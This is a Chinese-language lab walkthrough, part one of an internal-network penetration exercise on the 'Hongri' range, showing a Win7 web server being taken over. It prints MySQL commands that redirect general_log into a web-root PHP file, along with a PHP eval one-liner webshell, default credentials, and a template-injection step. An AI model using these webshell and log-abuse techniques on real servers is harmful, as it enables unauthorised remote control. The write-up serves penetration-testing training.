红日靶场(内网渗透)——1

1.靶机信息。

win7 x64:ip:192.168.248.129

2008: ip:192.168.138

win2k3:192.168.52.141

攻击机信息:

kali:集成各种攻击工具  ip:192.168.248.128

win10:主要进行数据整理。

2.信息搜集。

1)使用kali扫描靶机

netdiscover -r 靶机IP网段

 

 

 发现win7外网网址为:192.168.248.129

对192.168.248.129进行端口扫描。

 

 

 发现开放端口80及3306.

确定使用HTTP和MYSQL服务。确定思路,使用SQL注入进行提权。

2)网站信息搜集

对网目录进行扫描,发现phpmyadmin页面:

 

 

 同时发现网站页面底部有mysql的连接测试检测:

 

 

 尝试root/root,连接成功:

 

 

 利用之前得到的信息,直接登录phpmyadmin,直接对mysql进行管理:

 

 

 3)利用sql进行getshell

利用步骤:

1.利用日志文件。

开启日志记录以及日志保存目录

SHOW VARIABLES LIKE '%general_log%'

 

 

 

SET GLOBAL general_log = "ON"

 

 

 将日志文件保存为php文件

SET GLOBAL general_log_file="C:/phpStudy/www/1.php"

 

 

 

2.利用一句话马

执行一句话马

SELECT '<?php eval($_POST["cmd"]);?>';

 

 利用菜刀进行连接:

 

 发现beifen.rar,应该为网站源码,下载查看。

 

 打开/yxcms/index.php,发现用户名admin和密码123456:

 

 登录,发现可以进行前台模板管理,注入一句话马:

 

 通过beifen.rar确定路径后,菜刀连接,至此win7权限已经获取完毕。之后进行内网渗透,请见下一篇文章。